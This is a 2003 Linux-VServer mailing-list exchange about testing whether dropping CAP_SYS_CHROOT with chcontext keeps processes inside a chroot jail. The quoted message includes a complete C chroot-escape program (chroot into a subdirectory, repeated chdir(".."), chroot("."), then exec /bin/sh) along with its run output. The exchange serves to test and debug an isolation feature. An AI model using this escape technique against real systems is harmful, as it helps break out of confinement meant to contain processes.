From: Herbert Poetzl (herbert_at_13thfloor.at)
Date: Thu 30 Oct 2003 - 11:30:18 GMT
On Wed, Oct 29, 2003 at 11:36:42PM -0600, Linas Vepstas wrote:
>
> Hi,
>
> I'm having problems testing chroot with chcontext ... it seems broken
> for me. Maybe I'm doing something wrong. Anyone know if the following
> should have worked?
>
> I assumed that taking away CAP_SYS_CHROOT would not let me
> break out of chroot jails but it seems that I can break out
> after all. I'm gonna try to see if this is a kernel bug
> tommorow ... or if I'm just entertaining false hopes...
hmm, after --cap '!CAP_SYS_CHROOT', you should not be able
to perform chroot() at all ... and I don't see any reason
why the chroot() in you example should have worked ...
so of course you can break out of a chroot that didn't happen
but what is the point of that?
confused,
Herbert
> The way I understand it, chcontext should have set 'the cap ceiling'
> which means that children cannot inherit anything looser ...
>
> xx:~/mnt# chcontext --secure --cap '!CAP_SYS_CHROOT' /bin/sh
> New security context is 14
> xx:~/mnt# ps ax
> PID TTY STAT TIME COMMAND
> 1 ? S 0:12 init [2]
> 27797 pts/1 S 0:00 /bin/sh
> 27798 pts/1 R 0:00 ps ax
> xx:~/mnt# getpcaps 27797
> Capabilities for `27797': =
> cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_net_bind_service,cap_sys_ptrace,cap_sys_tty_config,cap_lease+ep
> xx:~/mnt# vi c.c
>
> #include <stdlib.h>
> #include <stdio.h>
> #include <unistd.h>
> #include <sys/stat.h>
> #include <sys/types.h>
> int main(void)
> {
> char buff [100];
> int i;
> // chdir("/root/mnt/breakout");
> // chroot("/root/mnt/breakout");
>
> getcwd(buff, 100);
> printf ("duude we are in %s\n", buff);
>
> mkdir("bust", 0700);
> chroot("bust");
> getcwd(buff, 100);
> printf ("duude we are in %s\n", buff);
> for (i = 0; i < 10; i++) {
> chdir("..") ;
>
> getcwd(buff, 100);
> printf ("by bye duude we are in %s\n", buff);
> }
> chroot(".");
> execl("/bin/sh", "/bin/sh",NULL);
> }
>
> xx:~/mnt# cc -static c.c
> xx:~/mnt# ./a.out
> duude we are in /root/mnt
> duude we are in /root/mnt
> by bye duude we are in /root
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> by bye duude we are in /
> xx:/# ^D exit
> xx:~/mnt# mount
> [... stuff deleted ...]
> /root/tmp on /root/mnt type none (rw,bind)
>
> xx:~/mnt# cat /proc/version
>
> Linux version 2.4.22ctx-17c (root_at_xx) (gcc version 3.3.2
> 20030908 (Debian prerelease)) #3 SMP Fri Oct 24 22:34:38 CDT 2003
>
> This was a standard Marcello kernel before the ctx-17c patch ...
> I'm running on i386 arch.
>
>
> --linas
>
> --
> pub 1024D/01045933 2001-02-01 Linas Vepstas (Labas!) <linas_at_linas.org>
> PGP Key fingerprint = 8305 2521 6000 0B5E 8984 3F54 64A9 9A82 0104 5933
> _______________________________________________
> Vserver mailing list
> Vserver_at_list.linux-vserver.org
> http://list.linux-vserver.org/mailman/listinfo/vserver
_______________________________________________
Vserver mailing list
Vserver_at_www.solucorp.qc.ca
http://www.solucorp.qc.ca/mailman/listinfo/vserver